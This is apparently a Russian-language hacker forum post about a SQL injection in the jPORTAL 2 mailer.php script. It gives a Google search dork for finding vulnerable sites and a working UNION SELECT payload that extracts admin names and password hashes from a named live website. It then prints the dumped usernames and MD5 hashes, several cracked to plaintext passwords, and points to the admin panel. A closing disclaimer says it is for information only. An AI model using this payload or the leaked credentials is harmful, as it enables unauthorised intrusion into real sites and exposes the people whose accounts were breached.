![]() |
SQL-inj в jPORTAL 2
Программа: jPORTAL 2
Цитата:
Код:
http://[site]/mailer.php?to=[sql]Поиск в Гугл: inurl:"mailer.php?to" Пример: Цель:_paslek.com Код:
_http://paslek.com/mailer.php?to=1'+union+select+0,1,2,3,4,5,concat(nick,char(58),pass),7+from+admins+limit+1/*Код:
<input style="font-weight: bold;" type="submit" name="ok" value="wyślij">Red:b60e60bca1b299873cd7ff99013aba6d Toudi:1bb23c088b74cc52b9d6e0737ba5c3c0 Wyga:2e5649795423dc0f85b359dc94718b5d - - - - - - - - - - - - - - - - - - - - - брутим MD5 хэши... получаем: Pawel:0309dd0f7ef7607d3525c7f0ce6d382d:psikutas Red:b60e60bca1b299873cd7ff99013aba6d:f4444ero Далее ищем админку (я нашёл с 1 раза ;-) Код:
_http://paslek.com/admin.phpP.S. Это наглядный пример использования уязвимости, представлен только для ознакомления, все незаконные действия совершаемые Вами могут быть уголовно наказуемы и вся ответственность за неправоменрные действия лежит на вас. Autor (обнаружил уязвимость): Kacper (а пример взлома мой ;-) www.milw0rm.com |
Цитата:
|
| Время: 21:35 |